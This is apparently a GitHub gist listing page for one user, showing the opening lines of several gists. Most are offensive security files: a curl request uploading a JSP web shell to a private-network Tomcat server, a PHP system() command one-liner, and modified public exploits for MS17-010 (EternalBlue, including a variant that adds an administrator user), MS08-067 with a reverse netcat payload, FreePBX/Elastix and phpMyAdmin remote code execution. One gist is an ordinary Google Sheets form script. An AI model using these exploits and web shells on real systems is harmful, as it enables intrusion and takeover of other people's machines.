Rithwik Jayasimha thel3l
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -X PUT \ | |
| http://192.168.1.97:8080/exploit1.jsp/ \ | |
| -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' \ | |
| -H 'Cache-Control: no-cache' \ | |
| -H 'Cookie: 3CF55E9DEF8C504D35340369C389EF8A' \ | |
| -H 'Postman-Token: a38a0a36-da12-5b6f-3d56-339e13381c36' \ | |
| -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36' \ | |
| -d '<%@page import="java.lang.*"%> | |
| <%@page import="java.util.*"%> | |
| <%@page import="java.io.*"%> |
thel3l
/ google_form_from_sheet.gs
Created
June 17, 2021 17:37
Short Google Apps Script that takes data from a Google Sheet and posts it to a Google Form. Script autofilling forms etc.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function myFunction() { | |
| var Workbook = SpreadsheetApp.getActiveSpreadsheet(); | |
| var Wrksheet = Workbook.getSheetByName("Sheet1"); // Enter sheet number | |
| var FormURL = ""; // Enter Google form URL here | |
| var FormData = ""; // init | |
| // Replace w. your vars | |
| var Name = ""; | |
| var Age = ""; | |
| var Mobile = ""; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php system("ls -la"); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| fnieawbnfiehf efhiuaehfiu |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # impacket SMB extension for MS17-010 exploit. | |
| # this file contains only valid SMB packet format operation. | |
| from impacket import smb, smbconnection | |
| from impacket.dcerpc.v5 import transport | |
| from struct import pack | |
| import os | |
| import random | |
| def getNTStatus(self): |
thel3l
/ ms17-010_Win7_2008.py
Created
June 25, 2018 09:59
Sleepya's port of the Eternalblue exploit for systems running Windows 7/Server 2008. Requires mysmb.py.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb, smbconnection | |
| from mysmb import MYSMB | |
| from struct import pack, unpack, unpack_from | |
| import sys | |
| import socket | |
| import time | |
| ''' | |
| MS17-010 exploit for Windows 2000 and later by sleepya |
thel3l
/ ms17-010_sleepya-fixed.py
Created
June 25, 2018 04:06
Modified version of Sleepya's MS17-010 exploit to create and add a user to the administrative group
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb, smbconnection | |
| from mysmb import MYSMB | |
| from struct import pack, unpack, unpack_from | |
| import sys | |
| import socket | |
| import time | |
| ''' | |
| MS17-010 exploit for Windows 2000 and later by sleepya |
thel3l
/ ms08-067-fixed.py
Created
June 3, 2018 16:32
Updated ms08-67 exploit without custom netcat listener.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ############################################################################################### | |
| # MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 # | |
| # Designed for Kali Linux - msfvenom and nc required to function # | |
| # Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ # | |
| # Modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/). # | |
| # The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi # | |
| ############################################################################################### | |
| import struct |
thel3l
/ 18650-fixed.py
Created
June 2, 2018 11:31
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution - Fixed to avoid SSL errors.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ############################################################ | |
| # Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit | |
| # Google Dork: oy vey | |
| # Date: March 23rd, 2012 | |
| # Author: muts | |
| # Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. | |
| # Tested on: multiple | |
| # CVE : notyet | |
| # Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ |
thel3l
/ 17510-fixed.py
Last active
May 11, 2020 18:17
phpMyAdmin3 (pma3) - Remote Code Execution - CVE-2011-2505, CVE-2011-2506 (https://www.exploit-db.com/exploits/17510/): Fixes urlopen SSL 'Version too Low' errors
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # coding=utf-8 | |
| # pma3 - phpMyAdmin3 remote code execute exploit | |
| # Author: wofeiwo<wofeiwo@80sec.com> | |
| # Thx Superhei | |
| # Tested on: 3.1.1, 3.2.1, 3.4.3 | |
| # CVE: CVE-2011-2505, CVE-2011-2506 | |
| # Date: 2011-07-08 | |
| # Have fun, DO *NOT* USE IT TO DO BAD THING. | |
| ################################################ |
NewerOlder